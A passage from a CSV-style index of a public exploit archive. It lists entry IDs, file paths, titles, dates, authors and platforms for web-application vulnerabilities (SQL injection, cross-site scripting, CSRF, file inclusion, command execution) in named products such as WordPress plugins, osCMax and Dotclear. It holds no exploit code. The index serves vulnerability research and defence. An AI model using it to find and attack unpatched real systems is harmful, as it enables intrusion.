Vulnerabilities",2015-04-29,"High-Tech Bridge SA",webapps,php,80 +36861,exploits/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,webapps,windows,5466 +36862,exploits/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",webapps,php,80 +36863,exploits/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,webapps,php, +36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,webapps,hardware, +36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,webapps,php, +36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",webapps,php, +36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php, +36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php, +36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php, +36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,webapps,php, +36878,exploits/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",webapps,php, +36882,exploits/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' SQL Injection",2012-02-26,"Red Security TEAM",webapps,php, +36883,exploits/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,webapps,php, +36885,exploits/php/webapps/36885.txt,"Bontq - 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,webapps,php, +36886,exploits/php/webapps/36886.txt,"OSQA's CMS - Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",webapps,php, +36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php, +36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php, +36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",webapps,php, +36891,exploits/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php?page' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php, +36892,exploits/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",webapps,php, +36893,exploits/php/webapps/36893.txt,"Fork CMS 3.x - '/private/en/locale/index?name' Cross-Site Scripting",2012-02-28,anonymous,webapps,php, +36894,exploits/php/webapps/36894.txt,"Fork CMS 3.x - '/backend/modules/error/actions/index.php?parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities",2012-02-28,anonymous,webapps,php, +36895,exploits/php/webapps/36895.txt,"starCMS - 'q' URI Cross-Site Scripting",2012-03-02,Am!r,webapps,php, +36897,exploits/php/webapps/36897.txt,"LastGuru ASP Guestbook - 'View.asp' SQL Injection",2012-03-04,demonalex,webapps,php, +36898,exploits/php/webapps/36898.txt,"Etano 1.20/1.22 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",webapps,php, +36899,exploits/php/webapps/36899.txt,"Etano 1.20/1.22 - 'photo_search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",webapps,php, +36900,exploits/php/webapps/36900.txt,"Etano 1.20/1.22 - 'photo_view.php?return' Cross-Site Scripting",2012-03-05,"Aung Khant",webapps,php, +36914,exploits/php/webapps/36914.txt,"Fork CMS 3.2.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",webapps,php, +36916,exploits/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' SQL Injection",2012-03-07,"Rob Miller",webapps,php, +36917,exploits/php/webapps/36917.txt,"OSClass 2.3.x - Directory Traversal / Arbitrary File Upload",2012-03-07,"Filippo Cavallarin",webapps,php, +36910,exploits/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Local File Inclusion",2012-03-05,"Aung Khant",webapps,php, +36911,exploits/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments?topicID' SQL Injection",2012-03-05,"Chokri B.A",webapps,php, +36912,exploits/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps?id' SQL Injection",2012-03-05,"Chokri B.A",webapps,php, +36913,exploits/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Blind SQL Injection",2012-03-05,"Colin Wong",webapps,php, +36904,exploits/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - Local File Inclusion",2015-05-04,Vulnerability-Lab,webapps,ios, +36973,exploits/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,webapps,php, +36922,exploits/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,webapps,ios, +36907,exploits/php/webapps/36907.txt,"WordPress Plugin Ultimate Product Catalogue 3.1.2 - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / Arbitrary File Upload Vulnerabilities",2015-05-04,"Felipe Molina",webapps,php, +36965,exploits/php/webapps/36965.txt,"Omnistar Live - Cross-Site Scripting / SQL Injection",2012-03-13,sonyy,webapps,php, +36967,exploits/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,webapps,php, +36968,exploits/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Local File Inclusion",2012-03-14,n0tch,webapps,php, +36970,exploits/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' SQL Injection",2012-03-16,"Vulnerability Research Laboratory",webapps,php, +36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,webapps,java, +36924,exploits/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,webapps,ios, +36925,exploits/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",webapps,php, +36926,exploits/php/webapps/36926.txt,"LeKommerce - 'id' SQL Injection",2012-03-08,Mazt0r,webapps,php, +36927,exploits/php/webapps/36927.txt,"ToendaCMS 1.6.2 - '/setup/index.php?site' Traversal Local File Inclusion",2012-03-08,AkaStep,webapps,php, +36929,exploits/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",webapps,jsp, +36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple, +36934,exploits/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - 'listing.aspx?searchText' Cross-Site Scripting",2012-03-08,vulns@dionach.com,webapps,asp, +36935,exploits/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx?guide' Cross-Site Scripting",2012-03-08,vulns@dionach.com,webapps,asp, +36936,exploits/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx?id' Cross-Site Scripting",2012-03-08,vulns@dionach.com,webapps,asp, +36937,exploits/php/webapps/36937.html,"PHPMyVisites 2.4 - 'PHPmv2/index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,webapps,php, +36938,exploits/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Cross-Site Scripting",2012-03-11,T0xic,webapps,php, +36939,exploits/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Cross-Site Scripting",2012-03-11,MustLive,webapps,java, +36940,exploits/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",webapps,cgi,443 +36941,exploits/xml/webapps/36941.txt,"IBM Websphere Portal - Persistent Cross-Site Scripting",2015-05-07,"Filippo Roncari",webapps,xml, +36942,exploits/php/webapps/36942.txt,"WordPress Plugin Freshmail 1.5.8 - 'shortcode.php' SQL Injection",2015-05-07,"Felipe Molina",webapps,php,80 +36943,exploits/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,webapps,ios, +36944,exploits/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",webapps,php, +36946,exploits/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search Multiple Field SQL Injections",2012-03-12,"Stefan Schurtz",webapps,php, +36947,exploits/php/webapps/36947.txt,"Wikidforum 2.10 - Search Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",webapps,php, +36948,exploits/php/webapps/36948.txt,"Wikidforum 2.10 - Advanced Search Multiple Cross-Site Scripting Vulnerabilities",2012-03-12,"Stefan Schurtz",webapps,php, +36949,exploits/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",webapps,php,5272 +36950,exploits/php/webapps/36950.txt,"Syncrify Server 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",webapps,php,5800 +36951,exploits/php/webapps/36951.txt,"SynaMan 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",webapps,php, +36952,exploits/php/webapps/36952.txt,"WordPress Plugin N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion",2015-05-08,T3N38R15,webapps,php, +36953,exploits/php/webapps/36953.txt,"SynTail 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",webapps,php, +36954,exploits/php/webapps/36954.txt,"WordPress Plugin Yet Another Related Posts 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,webapps,php,80 +36958,exploits/php/webapps/36958.txt,"WordPress Plugin Ultimate Profile Builder 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",webapps,php,80 +36959,exploits/php/webapps/36959.txt,"WordPress Plugin ClickBank Ads 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",webapps,php,80 +36960,exploits/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",webapps,windows,8080 +36961,exploits/php/webapps/36961.txt,"WordPress Plugin Ad Inserter 1.5.2 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",webapps,php,80 +36963,exploits/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",webapps,linux, +36974,exploits/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",webapps,cgi, +36975,exploits/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages - 'listing_search' SQL Injection",2012-03-19,r45c4l,webapps,php, +36976,exploits/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure",2012-03-18,Websecurity,webapps,cgi, +36977,exploits/php/webapps/36977.pl,"CreateVision CMS - 'id' SQL Injection",2012-03-11,"Zwierzchowski Oskar",webapps,php, +36978,exploits/hardware/webapps/36978.txt,"ZTE F660 - Remote Configuration Download",2015-05-11,"Daniel Cisa",webapps,hardware, +36979,exploits/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",webapps,php, +37186,exploits/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,webapps,php, +37006,exploits/java/webapps/37006.txt,"Minify 2.1.x - 'g' Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",webapps,java, +36986,exploits/php/webapps/36986.txt,"Pluck CMS 4.7 - Directory Traversal",2015-05-11,Wadeek,webapps,php, +36987,exploits/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - Parental Control Configuration Panel Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",webapps,hardware, +36988,exploits/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - URL Filter Configuration Panel Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",webapps,hardware, +36989,exploits/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injections",2015-05-11,"Filippo Roncari",webapps,php, +36990,exploits/php/webapps/36990.txt,"eFront 3.6.15 - Directory Traversal",2015-05-11,"Filippo Roncari",webapps,php, +36991,exploits/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection",2015-05-11,"Filippo Roncari",webapps,php, +36992,exploits/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery (Add User)",2015-05-11,hyp3rlinx,webapps,php, +36993,exploits/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,webapps,php, +36997,exploits/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",webapps,php, +36999,exploits/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php?authors[][url]' Cross-Site Scripting",2012-03-21,"High-Tech Bridge",webapps,php, +37000,exploits/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php?String::stripUnsafeHtml()' Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",webapps,php, +37001,exploits/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",webapps,php, +37002,exploits/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",webapps,php, +37003,exploits/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",webapps,php, +37004,exploits/php/webapps/37004.txt,"PHPCollab 2.5 - 'deletetopics.php' SQL Injection",2015-05-13,Wadeek,webapps,php, +37008,exploits/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Cross-Site Scripting",2012-03-24,3spi0n,webapps,php, +37009,exploits/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload",2012-03-23,voidloafer,webapps,java, +37010,exploits/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,webapps,php, +37011,exploits/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,webapps,php, +37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php, +37013,exploits/php/webapps/37013.txt,"NextBBS 0.6 - 'index.php?do' Cross-Site Scripting",2012-03-27,waraxe,webapps,php, +37015,exploits/asp/webapps/37015.txt,"Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,webapps,asp, +37016,exploits/php/webapps/37016.txt,"WordPress Plugin Integrator 1.32 - 'redirect_to' Cross-Site Scripting",2012-03-28,"Stefan Schurtz",webapps,php, +37017,exploits/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Cross-Site Scripting",2012-03-28,sonyy,webapps,php, +37018,exploits/php/webapps/37018.txt,"MyBB 1.6.6 - 'index.php?conditions[usergroup][]' SQL Injection",2013-03-27,"Aditya Modha",webapps,php, +37019,exploits/php/webapps/37019.txt,"MyBB 1.6.6 - 'index.php?conditions[usergroup][]' Cross-Site Scripting",2013-03-27,"Aditya Modha",webapps,php, +37021,exploits/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",webapps,php, +37022,exploits/php/webapps/37022.txt,"ocPortal 7.1.5 - 'code_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-28,"High-Tech Bridge",webapps,php, +37023,exploits/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",webapps,php, +37024,exploits/php/webapps/37024.txt,"EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",webapps,php, +37025,exploits/php/webapps/37025.txt,"PHP Designer 2007 Personal - Multiple SQL Injections",2012-03-30,MR.XpR,webapps,php, +37026,exploits/php/webapps/37026.txt,"e107 1.0 - 'view' SQL Injection",2012-03-30,Am!r,webapps,php, +37027,exploits/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Cross-Site Scripting",2012-03-29,Am!r,webapps,php, +37028,exploits/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Cross-Site Scripting",2012-03-30,"Sooraj K.S",webapps,php, +37029,exploits/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - '/fw/index2.do' Multiple Cross-Site Scripting Vulnerabilities",2012-04-01,"Vulnerability Research Laboratory",webapps,java, +37030,exploits/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/createAnomaly.do?subTab' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",webapps,java, +37031,exploits/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/mindex.do?url' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",webapps,java, +37032,exploits/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/syslogViewer.do?port' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",webapps,java, +37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",webapps,java, +37034,exploits/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",webapps,php, +37035,exploits/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",webapps,php, +37038,exploits/php/webapps/37038.txt,"osCMax 2.5 - '/admin/login.php?Username' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",webapps,php, +37039,exploits/php/webapps/37039.txt,"osCMax 2.5 - '/admin/htaccess.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",webapps,php, +37040,exploits/php/webapps/37040.txt,"osCMax 2.5 - '/admin/xsell.php?search' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",webapps,php, +37041,exploits/php/webapps/37041.txt,"osCMax 2.5 - '/admin/stats_products_purchased.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",webapps,php, +37042,exploits/php/webapps/37042.txt,"osCMax 2.5 - '/admin/stats_monthly_sales.php?status' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",webapps,php, +37043,exploits/php/webapps/37043.txt,"osCMax 2.5 - '/admin/stats_customers.php?sorted' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",webapps,php, +37044,exploits/php/webapps/37044.txt,"osCMax 2.5 - '/admin/information_manager.php?information_id' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",webapps,php, +37045,exploits/php/webapps/37045.txt,"osCMax 2.5 - '/admin/geo_zones.php?zID' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",webapps,php, +37046,exploits/php/webapps/37046.txt,"osCMax 2.5 - '/admin/new_attributes_include.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",webapps,php, +37047,exploits/php/webapps/37047.html,"osCMax 2.5 - '/admin/login.php?Username' SQL Injection",2012-04-04,"High-Tech Bridge SA",webapps,php, +37048,exploits/php/webapps/37048.txt,"osCMax 2.5 - '/admin/stats_monthly_sales.php?status' SQL Injection",2012-04-04,"High-Tech Bridge SA",webapps,php, +37050,exploits/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,webapps,php, +37054,exploits/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,webapps,php, +37055,exploits/php/webapps/37055.txt,"Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",webapps,php,80 +37057,exploits/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - Local File Inclusion",2015-05-18,Vulnerability-Lab,webapps,ios,80 +37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080 +37059,exploits/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery",2015-05-18,"Akash S. Chavan",webapps,windows, +37062,exploits/php/webapps/37062.txt,"vBulletin 4.1.10 - 'announcementid' SQL Injection",2012-04-04,Am!r,webapps,php, +37063,exploits/php/webapps/37063.txt,"WordPress Plugin TagGator - 'tagid' SQL Injection",2012-04-05,Am!r,webapps,php, +37067,exploits/php/webapps/37067.txt,"WordPress Plugin FeedWordPress 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",webapps,php,80 +37070,exploits/php/webapps/37070.txt,"WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,webapps,php, +37071,exploits/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,webapps,php, +37072,exploits/php/webapps/37072.txt,"Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections",2012-04-10,"Chokri B.A",webapps,php, +37073,exploits/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,webapps,php, +37074,exploits/php/webapps/37074.txt,"WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",webapps,php, +37152,exploits/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,webapps,jsp,80 +37075,exploits/php/webapps/37075.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget-form.php?title' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",webapps,php, +37076,exploits/php/webapps/37076.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'box_publish_button.php?button_value' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",webapps,php, +37077,exploits/php/webapps/37077.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'save_successful.php?msg' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",webapps,php, +37078,exploits/php/webapps/37078.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-11,"High-Tech Bridge SA",webapps,php, +37079,exploits/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injections",2015-05-21,"Filippo Roncari",webapps,php,80 +37080,exploits/php/webapps/37080.txt,"WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",webapps,php,80 +37082,exploits/php/webapps/37082.txt,"Bioly 1.3 - '/index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,webapps,php, +37083,exploits/php/webapps/37083.txt,"Joomla! Plugin Beatz 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",webapps,php, +37084,exploits/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 - Remote Command Injection",2012-04-13,"Helmut Grohne",webapps,cgi, +37085,exploits/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,webapps,php, +37086,exploits/php/webapps/37086.txt,"WordPress Plugin Yahoo Answer - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",webapps,php, +37087,exploits/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' HTML Injection",2012-04-17,"Marcos Garcia",webapps,php, +37090,exploits/php/webapps/37090.txt,"Joomla! Component JA T3 Framework - Directory Traversal",2012-04-17,indoushka,webapps,php, +37091,exploits/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'Username' Cross-Site Scripting",2012-04-17,"Aung Khant",webapps,php, +37092,exploits/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php?to_userid' Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",webapps,php, +37093,exploits/php/webapps/37093.txt,"XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-18,"High-Tech Bridge SA",webapps,php, +37094,exploits/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php?redirect_url' Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",webapps,php, +37095,exploits/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting",2012-04-20,sonyy,webapps,php, +37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php, +37253,exploits/php/webapps/37253.txt,"WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,webapps,php, +37254,exploits/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,webapps,php,80 +37255,exploits/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",webapps,php, +37100,exploits/php/webapps/37100.txt,"Waylu CMS - '/products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,webapps,php, +37101,exploits/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' SQL Injection",2012-04-23,E1nzte1N,webapps,php, +37102,exploits/php/webapps/37102.txt,"Joomla! Component com_videogallery - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,webapps,php, +37103,exploits/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",webapps,php, +37104,exploits/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Cross-Site Scripting",2012-04-26,"Jakub Galczyk",webapps,php, +37105,exploits/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Cross-Site Scripting",2012-04-26,"Jakub Galczyk",webapps,php, +37106,exploits/php/webapps/37106.txt,"WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",webapps,php,80 +37107,exploits/php/webapps/37107.txt,"WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",webapps,php,80 +37108,exploits/php/webapps/37108.txt,"WordPress Plugin Landing Pages 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",webapps,php,80 +37109,exploits/php/webapps/37109.txt,"WordPress Plugin GigPress 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",webapps,php,80 +37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080 +37111,exploits/php/webapps/37111.txt,"WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution",2015-05-26,woodspeed,webapps,php,80 +37112,exploits/php/webapps/37112.txt,"WordPress Plugin church_admin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,webapps,php,80 +37113,exploits/php/webapps/37113.txt,"WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,webapps,php,80 +37114,exploits/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",webapps,jsp,80 +37115,exploits/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",webapps,perl, +37116,exploits/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection",2012-04-27,"Mehmet Ince",webapps,php, +37117,exploits/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",webapps,perl, +37118,exploits/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' 